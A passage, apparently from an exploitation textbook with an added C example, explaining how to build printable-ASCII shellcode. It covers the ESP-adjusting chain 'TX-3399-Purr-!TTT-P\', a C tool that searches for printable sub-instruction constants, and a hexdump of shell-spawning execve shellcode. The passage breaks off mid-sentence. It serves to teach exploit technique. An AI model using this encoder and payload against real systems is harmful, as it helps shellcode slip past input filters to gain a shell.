reader@hacking:~/booksrc $ gdb -q
(gdb) print 0 - 0x39393333 - 0x72727550 - 0x54545421
$1 = 860
(gdb)
The goal is to subtract these values from ESP, not EAX, but sub esp, imm32 doesn't
assemble into printable ASCII: it encodes as 0x81 0xEC followed by the immediate,
whereas sub eax, imm32 is the single opcode byte 0x2D, the character -. So the current
value of ESP must be moved into EAX for the subtraction, and then the new value of
EAX must be moved back into ESP.
However, since neither mov esp, eax nor mov eax, esp assembles into printable
ASCII (both begin with the opcode byte 0x89), this exchange must be done using the
stack. By pushing the value from the source register onto the stack and then popping
it off into the destination register, the equivalent of a mov dest, source instruction
can be accomplished with push source followed by pop dest. Fortunately, the push and
pop instructions for both the EAX and ESP registers assemble into printable ASCII
characters, so this can all be done using printable ASCII.
Here is the final set of instructions to add 860 to ESP.
push esp ; Assembles into T
pop eax ; Assembles into X
sub eax, 0x39393333 ; Assembles into -3399
sub eax, 0x72727550 ; Assembles into -Purr
sub eax, 0x54545421 ; Assembles into -!TTT
push eax ; Assembles into P
pop esp ; Assembles into \
This means that TX-3399-Purr-!TTT-P\ will add 860 to ESP in machine
code. So far, so good. Now the shellcode must be built.
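The constants above were found by hand. As an added example (this is not code from the book), the small C tool below automates that search: given a start value and a target, it finds three immediates made only of printable bytes such that start - a - b - c wraps around to target, and renders the resulting sub eax chain as the bytes the CPU sees (0x2D '-' followed by the little-endian immediate). The same search is what sets EAX to an arbitrary dword for the loader built next. The assumed printable range is 0x21 '!' through 0x7e '~', which excludes space and control bytes; the constants it produces differ from the book's but satisfy the same equation.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed printable range: '!' (0x21) through '~' (0x7e); space and controls excluded. */
static int is_printable_byte(unsigned v) { return v >= 0x21 && v <= 0x7e; }

int all_printable(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (!is_printable_byte((v >> (8 * i)) & 0xff)) return 0;
    return 1;
}

/* What the CPU computes for: sub eax, a ; sub eax, b ; sub eax, c  (mod 2^32). */
uint32_t apply_subs(uint32_t start, uint32_t a, uint32_t b, uint32_t c)
{
    return start - a - b - c;
}

/*
 * Find sub[0..2], each a 32-bit immediate of printable bytes only, such that
 *   start - sub[0] - sub[1] - sub[2] == target      (mod 2^32),
 * i.e. sub[0] + sub[1] + sub[2] == start - target. Solved one byte at a time
 * from the low byte, carrying into the next. Three printable bytes plus a carry
 * sum to at most 0x17b, so the carry is 0 or 1 and every byte value is reachable.
 * Returns 1 on success, 0 if some byte could not be formed.
 */
int find_sub_constants(uint32_t start, uint32_t target, uint32_t sub[3])
{
    uint32_t need = start - target;
    unsigned carry = 0;
    sub[0] = sub[1] = sub[2] = 0;

    for (int i = 0; i < 4; i++) {
        unsigned want = (need >> (8 * i)) & 0xff;
        int found = 0;
        for (unsigned a = 0x21; a <= 0x7e && !found; a++) {
            for (unsigned b = 0x21; b <= 0x7e && !found; b++) {
                /* Given a and b, the low byte of the sum forces c. */
                unsigned c = (want - carry - a - b) & 0xff;
                if (!is_printable_byte(c)) continue;
                sub[0] |= a << (8 * i);
                sub[1] |= b << (8 * i);
                sub[2] |= c << (8 * i);
                carry = (a + b + c + carry) >> 8;   /* right side uses the incoming carry */
                found = 1;
            }
        }
        if (!found) return 0;
    }
    return 1;
}

/* Render the three sub eax, imm32 instructions as machine-code text: 0x2d ('-')
 * then the immediate little-endian, so 0x39393333 becomes "-3399".
 * Returns a static buffer (fine for a single-threaded tool). */
const char *chain_text(uint32_t a, uint32_t b, uint32_t c)
{
    static char buf[16];
    uint32_t imm[3] = { a, b, c };
    char *p = buf;
    for (int i = 0; i < 3; i++) {
        *p++ = '-';
        for (int j = 0; j < 4; j++)
            *p++ = (char)((imm[i] >> (8 * j)) & 0xff);
    }
    *p = '\0';
    return buf;
}

/* Search, then verify the result arithmetically and byte by byte. */
int check_chain(uint32_t start, uint32_t target)
{
    uint32_t s[3];
    if (!find_sub_constants(start, target, s)) return 0;
    if (!all_printable(s[0]) || !all_printable(s[1]) || !all_printable(s[2])) return 0;
    return apply_subs(start, s[0], s[1], s[2]) == target;
}

int main(void)
{
    uint32_t s[3];

    /* esp += 860: EAX holds ESP, so a+b+c must equal -860 (start 0, target 860). */
    find_sub_constants(0, 860, s);
    printf("TX%sP\\   ; esp += 860  (%08x %08x %08x)\n", chain_text(s[0], s[1], s[2]),
           (unsigned)s[0], (unsigned)s[1], (unsigned)s[2]);

    /* eax = 0x80cde189 from a zeroed EAX: the first dword the loader will push. */
    find_sub_constants(0, 0x80cde189u, s);
    printf("%s        ; eax = %08x\n", chain_text(s[0], s[1], s[2]),
           (unsigned)apply_subs(0, s[0], s[1], s[2]));
    return 0;
}
```

The book's own constants check out against the same arithmetic: apply_subs(0, 0x39393333, 0x72727550, 0x54545421) is 860, and chain_text renders them as -3399-Purr-!TTT. Byte-wise search with a forward carry is the general form of the trick the text applies by hand, which is why three subtractions always suffice for any 32-bit target in this byte range.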
First, EAX must be zeroed out; this is easy now that a method has been
discovered. Then, by using more sub instructions, the EAX register must be
set to the last four bytes of the shellcode, in reverse order. Since the stack
grows toward lower memory addresses and is filled in last-in, first-out order,
the first value pushed to the stack must be the last four bytes of the shellcode,
so that once all the pushes are done the shellcode sits in memory in the right
order, starting at the lowest address. Within each dword the bytes must be reversed,
because of the little-endian byte ordering. The following output shows a hexadecimal
dump of the standard shellcode used in the previous chapters, which will be built by
the printable loader code.
reader@hacking:~/booksrc $ hexdump -C ./shellcode.bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|
In this case, the last four bytes are 89 e1 cd 80; read as a little-endian dword,
the proper value for the EAX register is 0x80cde189. This is easy to do by using
sub instructions to wrap the value around. Then, EAX can be pushed to the stack. This moves